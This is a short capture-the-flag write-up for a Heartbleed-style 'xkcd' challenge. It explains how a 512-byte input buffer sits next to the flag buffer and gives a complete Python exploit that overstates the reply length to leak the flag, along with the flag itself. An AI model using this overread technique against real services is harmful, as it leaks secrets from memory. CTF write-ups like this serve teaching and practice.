Might want to read that comic as well... 1354
We have a binary and a service with this binary.
After quick inspection I've noticed a reference to heartbleed explanation xkcd comic.
Our input data are stored to globals buffer (in .bss segment) - which is 512 bytes long.
And right after that buffer a flag_buffer (with data from flag file) is located.
So we could input 512 bytes input data to fully fill globals buffer and make it adjacent to the flag buffer.
After that input the length (letters count) 512 + length of the flag.
I have empirically determined the length of the flag. Here is the final exploit:
import socket s = socket.socket() s.settimeout(5) address = 'xkcd_be4bf26fcb93f9ab8aa193efaad31c3b.quals.shallweplayaga.me' port = 1354 s.connect((address, port)) payload = 'SERVER, ARE YOU STILL THERE? IF SO, REPLY "%s" (%s LETTERS)\n' % ('A' * 512, 512 + 29) print payload s.send(payload) data = s.recv(2048) print data
And successfully got the flag.
The flag is: bl33ding h34rt5